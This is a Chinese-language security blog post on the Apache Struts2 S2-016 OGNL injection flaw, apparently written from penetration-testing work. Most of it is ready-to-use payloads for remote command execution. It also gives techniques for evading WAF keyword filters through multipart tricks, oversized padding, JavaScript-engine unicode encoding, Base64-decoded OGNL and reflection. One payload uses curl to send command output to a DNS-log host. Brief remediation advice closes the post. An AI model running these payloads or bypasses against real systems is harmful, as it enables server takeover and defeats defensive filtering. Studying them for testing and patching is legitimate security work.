S2-016漏洞整理

admin 2021年1月20日01:32:03评论178 views字数 5164阅读17分12秒阅读模式

引言

  最近项目上跟Struts2框架打交道比较多,整理一下比较经典的几个漏洞的测试以及Bypass姿势。首先是S2-016。
PS:升级迁移这个东西真的很费劲。

S2-016漏洞整理

关于S2-016测试

影响版本

  Struts 2.3.15.1之前的所有版本

验证及判断方法

  一般可以通过在对应的接口,使用如下Payload触发302重定向来进行判断:
java
redirect:${1*1}
redirectAction:${1*1}
redirect-action:${1*1}(老版本的Struts2可以使用)

  会触发302跳转并且执行对应的算数表达式:

S2-016漏洞整理
  利用application(Struts2自带的ActionContext类特性)确定可以执行代码:
java
redirect:${#application.get('javax.servlet.context.tempdir')}

  通过执行application对象(Web服务器启动时,会自动会每个Web服务目录都创建一个application对象)的方法,尝试读取项目中的临时存储目录来判断是否可以执行代码:

S2-016漏洞整理

绕过手法

  主要思路就是绕过关键字检测。

multipart绕过

  跟Spring框架不一样,Struts2的multipart提交方式并不能通过删除from-data或者大小写变换Content-Type的内容来进行提交。以下是struts2的处理方式:
```java
protected HttpServletRequest processMultipart(HttpServletRequest request)
{
if (!"POST".equalsIgnoreCase(request.getMethod())) {
return request;
}

String contentType = request.getContentType();
if ((contentType != null) && (contentType.startsWith("multipart/form-data")))
{
  return new MultipartRequestWrapper(request);
}
return request;

}
```
  绕过方式主要是修改成multipart提交方式:

S2-016漏洞整理
  因为是startsWith的检查,所以也可以修改相关内容为multipart/form-databypass进行绕过。

写入超长变量构造超大数据包

  可以通过新建字符串变量的方式,创建超长的字符变量,尝试绕过waf(一般waf对于超大数据包有buffer防守,超过buffer防守的话,即可绕过防护):
  创建字符串变量的方式:
```java

x=(new java.lang.String[] {'a'})

  payload变形:java
redirect:${#x=(new java.lang.String[] {'aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa'}),new java.io.BufferedReader(new java.io.InputStreamReader(new java.lang.ProcessBuilder(new java.lang.String[]{'/bin/sh','-c','whoami'}).start().getInputStream())).readLine()}
```

S2-016漏洞整理

调用js引擎编码绕过

  针对一些敏感字符例如start()之类的检测拦截,可以考虑调用Java的js引擎进行编码解码操作来进行绕过。
   js引擎调用:
java
new javax.script.ScriptEngineManager().getEngineByName("js").eval(此处的Payload可以进行unicode编码)

  payload变形:
java
redirect:${new javax.script.ScriptEngineManager().getEngineByName("js").eval("new j\u0061va.lang.ProcessBuilder['(java.l\u0061ng.String[])'](['/bin/sh','-c','curl http://dnslog地址/`whoami`']).start()\u003B")}

S2-016漏洞整理

调用base64引擎编码绕过

  针对一些敏感字符例如start()之类的检测拦截,可以考虑调用Java的Base64引擎进行编码解码操作来进行绕过。
  前提条件要满足Struts2 version<=2.0.14
  主要是这两个编码引擎:
  com.sun.xml.internal.messaging.saaj.util.Base64():
java
redirect:${#p=new com.sun.xml.internal.messaging.saaj.util.Base64().base64Decode('Base64编码部分'),@ognl.Ognl@getValue(new java.lang.String(#p), #context, #context.getRoot())}

  sun.misc.BASE64Decoder():
java
redirect:${#p=new com.sun.xml.internal.messaging.saaj.util.Base64().base64Decode('Base64编码部分'),@ognl.Ognl@getValue(new java.lang.String(#p), #context, #context.getRoot())}

  Base64编码部分:
  将以下poc写入想要执行的命令,Base64编码然后放入到编码引擎poc中即可:
```java

req=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),#s=new java.util.Scanner((new java.lang.ProcessBuilder('想要执行的命令'.toString().split('\\s'))).start().getInputStream()).useDelimiter('\\AAAA'),#str=#s.hasNext()?#s.next():'',#resp=#context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),#resp.setCharacterEncoding('UTF-8'),#resp.getWriter().println(#str),#resp.getWriter().flush(),#resp.getWriter().close()

&emsp;&emsp;举例:java
redirect:${#p=new sun.misc.BASE64Decoder().decodeBuffer('I3JlcT0jY29udGV4dC5nZXQoJ2NvbS5vcGVuc3ltcGhvbnkueHdvcmsyLmRpc3BhdGNoZXIuSHR0cFNlcnZsZXRSZXF1ZXN0JyksI3M9bmV3IGphdmEudXRpbC5TY2FubmVyKChuZXcgamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyKCd3aG9hbWknLnRvU3RyaW5nKCkuc3BsaXQoJ1xcXFxzJykpKS5zdGFydCgpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlcignXFxcXEFBQUEnKSwjc3RyPSNzLmhhc05leHQoKT8jcy5uZXh0KCk6JycsI3Jlc3A9I2NvbnRleHQuZ2V0KCdjb20ub3BlbnN5bXBob255Lnh3b3JrMi5kaXNwYXRjaGVyLkh0dHBTZXJ2bGV0UmVzcG9uc2UnKSwjcmVzcC5zZXRDaGFyYWN0ZXJFbmNvZGluZygnVVRGLTgnKSwjcmVzcC5nZXRXcml0ZXIoKS5wcmludGxuKCNzdHIpLCNyZXNwLmdldFdyaXRlcigpLmZsdXNoKCksI3Jlc3AuZ2V0V3JpdGVyKCkuY2xvc2UoKQ=='),@ognl.Ognl@getValue(new java.lang.String(#p), #context, #context.getRoot())}
```

S2-016漏洞整理
  com.sun.xml.internal.messaging.saaj.util.Base64:

S2-016漏洞整理

通过反射进行调用

  针对某些waf可能检测类似start、readline等命令关键字。可以通过反射结合byte字节转换来绕过。
  这里通过反射调用ProcessBuilder的start方法,以及BufferedReader的readline方法。通过结合byte字节转换来屏蔽对应关键字:
java
redirect:${#p=new java.lang.ProcessBuilder(new java.lang.String[]{'bash','-c','whoami'}),#m=#p.getClass().getDeclaredMethod('start',null),#p1=#m.invoke(#p,null),#isr=new java.io.InputStreamReader(#p1.getInputStream()),#br=new java.io.BufferedReader(#isr),#m1=#br.getClass().getMethod(new java.lang.String(new byte[]{114,101,97,100,76,105,110,101}),null),#m1.invoke(#br,null)}

S2-016漏洞整理

修复建议

  1. 按照官方建议进行Struts2的版本升级;(可能导致例如Spring不兼容的问题,影响稳定性)
  2. 手工修改Ognl.jar源码,增加恶意代码的过滤;
  3. 重写struts2 DefaultActionMapper的handleSpecialParameters方法,增加action、redirect、redirectAction等参数的过滤。
  4. 在沙箱中运行OGNL表达式:
    添加-Dognl.security.manager参数
    限制OGNL表达式最大允许长度:struts.ognl.expressionMaxLength
    参考[https://struts.apache.org/security/#proactively-protect-from-ognl-expression-injections-attacks-if-easily-applicable](

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年1月20日01:32:03
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   S2-016漏洞整理https://cn-sec.com/archives/246835.html